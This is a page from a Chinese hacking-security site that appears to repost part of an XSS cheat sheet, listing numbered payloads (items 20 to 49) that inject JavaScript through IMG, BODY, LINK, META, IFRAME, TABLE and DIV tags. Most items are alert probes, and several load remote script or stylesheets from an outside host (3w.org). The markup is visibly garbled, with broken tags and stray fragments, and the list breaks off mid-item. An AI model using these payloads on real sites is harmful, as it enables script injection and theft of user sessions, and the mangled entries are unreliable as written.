欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

xss其他标签下的js用法总结大全

来源:本站整理 作者:佚名 时间:2016-07-17 TAG: 我要投稿
IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>
(20)Non-alpha-non-digit XSS
/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”>
(21)Non-alpha-non-digit XSS to 2
BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
(22)Non-alpha-non-digit XSS to 3
/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”>
(23)双开括号
alert(“XSS”);//
(24)无结束脚本标记(仅火狐等浏览器)
SRC=http://3w.org/XSS/xss.js?
(25)无结束脚本标记2
SRC=//3w.org/XSS/xss.js>
(26)半开的HTML/JavaScript XSS
pan>
(27)双开角括号
iframe src=http://3w.org/XSS.html
(28)无单引号 双引号 分号
a=/XSS/
alert(a.source)CRIPT>
(29)换码过滤的JavaScript
\”;alert(‘XSS’);//
(30)结束Title标签
/TITLE>alert(“XSS”);
(31)Input Image
INPUT SRC=\'#\'" /span>
(32)BODY Image
BODY BACKGROUND=”javascript:alert(‘XSS’)”>
(33)BODY标签
BODY(‘XSS’)>
(34)IMG Dynsrc
IMG DYNSRC=\'#\'" /span>
(35)IMG Lowsrc
IMG LOWSRC=\'#\'" /span>
(36)BGSOUND
BGSOUND SRC=\'#\'" /span>
(37)STYLE sheet
LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
(38)远程样式表
LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
(39)List-style-image(列表式)
li {list-style-image: url(“javascript:alert(‘XSS’)”);}UL>LI>XSS
(40)IMG VBscript
IMG SRC=\'#\'" /STYLE>XSS
(41)META链接url
META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
(42)Iframe
IFRAME SRC=\'#\'" /IFRAME>
(43)Frame
FRAMESET>FRAME SRC=\'#\'" /FRAMESET>
(44)Table
TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
(45)TD
TABLE>TD BACKGROUND=”javascript:alert(‘XSS’)”>
(46)DIV background-image
DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
(48)DIV expression
DIV STYLE=”width: expression_r(alert(‘XSS’));”>
(49)STYLE属性分拆表达
IMG STYLE=”xss

上一页  [1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载